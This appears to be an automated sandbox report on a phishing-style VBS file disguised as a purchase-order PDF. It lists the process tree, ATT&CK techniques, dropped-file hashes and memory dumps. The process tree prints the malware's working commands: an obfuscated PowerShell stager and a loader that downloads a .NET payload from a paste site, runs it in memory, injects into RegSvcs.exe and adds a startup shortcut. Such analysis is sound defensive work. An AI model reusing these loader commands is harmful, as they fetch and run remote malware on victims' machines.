ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5352

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
PID:4692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:6104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
1KB

MD5
df27a876383bd81dfbcb457a9fa9f09d

SHA1
1bbc4ab95c89d02ec1d217f0255205787999164e

SHA256
8940500d6f057583903fde1af0287e27197410415639fc69beb39475fa5240dc

SHA512
fe68271375002cfcf8585c92b948ae47cd1632919c43db4bc738e2bc85ceea6dd30880dba27df9c3317531f1017624d4bd8979e6c5fad58112c7aa1189f0b844

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8dc7faa83176428daffaf42d97a729f

SHA1
b1bcd193d9b7663a7e1f62ad3d87cad82ff24881

SHA256
6852ff8779c2df850fcc33c3e1004e204d072b1dce607660b9100f2be2c1d33e

SHA512
be43b7f8c2db75bddcf5415e0bc19eeb0a519085f8c2418241b24e8645a3caae7815897a8ea97f9167988b9a1672d90173b26fcb759a0f0f48c5cf6b165bd9a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6fe7f2ff9f024b0658a4113e39b826fc

SHA1
07a0d4ec3b19b62fd409ddb60e843021ac40f1f3

SHA256
e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1

SHA512
64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs

Filesize
197KB

MD5
4730787ad81772f8d9b03ae8faf9efc3

SHA1
4d09795bab624a2dbeb62a14870693f8c0dc810c

SHA256
c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4

SHA512
d7b28b0377fd0ec04d105a6c3ee3ae92ff98d29b3d8aa1d1c677817fad4b9816126eb4e7e23376d60dd1d263dd0e3ad182732b2e2c8ee0cfa54c64440fdaeaec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mxyvllvm.r3p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk

Filesize
1KB

MD5
2ca552b4d6dddb138f4d966b5e37fabe

SHA1
79b5fc178a417342168fbe2c70481a53c92c9941

SHA256
d8901775bfee099d9ce6edbeb3248597997689706441a50d584b165b360cc166

SHA512
3913e9d5cba6fd7c95aafbf9156344ca545f9f1e0ac7e321ad69ab0a5eebf8de71e661b3b2d4c4c8222331d992439c1fed6e35e91c8c834d25f95e475bbe3d03

Download Submit
memory/528-12-0x00007FFC82CD0000-0x00007FFC83791000-memory.dmp

Filesize
10.8MB

Download
memory/528-43-0x00007FFC82CD0000-0x00007FFC83791000-memory.dmp

Filesize
10.8MB

Download
memory/528-0-0x00007FFC82CD3000-0x00007FFC82CD5000-memory.dmp

Filesize
8KB

Download
memory/528-11-0x00007FFC82CD0000-0x00007FFC83791000-memory.dmp

Filesize
10.8MB

Download
memory/528-6-0x00000266FFBC0000-0x00000266FFBE2000-memory.dmp

Filesize
136KB

Download
memory/2620-36-0x0000019A1CE30000-0x0000019A1CE3A000-memory.dmp

Filesize
40KB

Download
memory/2620-22-0x0000019A1CDF0000-0x0000019A1CDFA000-memory.dmp

Filesize
40KB

Download
memory/5232-44-0x0000000005A40000-0x0000000005FE4000-memory.dmp

Filesize
5.6MB

Download
memory/5232-52-0x0000000007CB0000-0x0000000007CC2000-memory.dmp

Filesize
72KB

Download
memory/5232-53-0x0000000007D10000-0x0000000007D4C000-memory.dmp

Filesize
240KB

Download
memory/5232-54-0x0000000007DC0000-0x0000000007E26000-memory.dmp

Filesize
408KB

Download
memory/5232-49-0x0000000006AA0000-0x0000000006B52000-memory.dmp

Filesize
712KB

Download
memory/5232-48-0x0000000006840000-0x0000000006890000-memory.dmp

Filesize
320KB

Download
memory/5232-47-0x0000000006CB0000-0x00000000072C8000-memory.dmp

Filesize
6.1MB

Download
memory/5232-46-0x0000000005560000-0x000000000556A000-memory.dmp

Filesize
40KB

Download
memory/5232-45-0x00000000055C0000-0x0000000005652000-memory.dmp

Filesize
584KB

Download
memory/5232-37-0x0000000000400000-0x0000000000724000-memory.dmp

Filesize
3.1MB

Download